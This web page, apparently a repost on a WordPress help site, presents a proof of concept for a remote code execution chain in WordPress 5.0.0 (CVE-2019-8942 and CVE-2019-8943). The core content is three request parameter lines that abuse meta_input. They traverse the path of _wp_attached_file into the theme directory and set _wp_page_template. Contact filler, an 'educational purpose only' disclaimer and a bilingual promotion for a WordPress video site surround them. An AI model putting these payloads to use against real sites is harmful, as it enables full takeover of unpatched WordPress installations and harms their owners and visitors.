WordPress Core 5.0.0 – Remote Code Execution (rce)




The flaw is the chain of a Path Traversal and Local File Inclusion vulnerability that lead to Remote Code Execution in the WordPress core and full remote takeover.

cve-2019-8942 & 2019-8943

Manual Poc by Legion

Payload:
&meta_input[_wp_attached_file]=year/month/file#/file
&meta_input[_wp_attached_file]=year/month/file#/../../../../themes/twentyseventeen/file
&meta_input[_wp_page_template]=cropped image

If You face any Problem
You can Contact with Us
………………………………………………………………………………………………..
Contact:::
………………………………………………………………………………………………..
Facebook:

==============================
Please Don’t Forget To Subscribe & Like
==============================
This tutorial is just for educational purpose only…….


Fuente – Source

WordPress Core 5.0.0 – Remote Code Execution (rce)

Necesitas ayuda con wp? Entonces WPVideo es tu sitio.
Encuentra lo que buscas entre cientos de miles de videos y experiencias personales de otros usuarios. Todos los que empezamos con wp deberíamos tener acceso a esta web, ojalá yo hubiera tenido algo así cuando empecé mi camino como webmaster 🙂
Pero ahora quiero y puedo poner esta web a vuestra disposición.
Disfrutadla 😉

Need help with wp? Then WPVideo is your site.
Find what you are looking for among hundreds of thousands of videos and personal experiences of other users. All of us who started with wp should have access to this website, I wish I had something like that when I started my journey as webmaster 🙂
But now I want and I can put this website at your disposal.
Enjoy it 😉

https://www.wpvideo.eu

Publicado en Soluciones (Problems solved), Temas (Themes), Tutoriales (Tutorials), Wordpress y etiquetado .

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *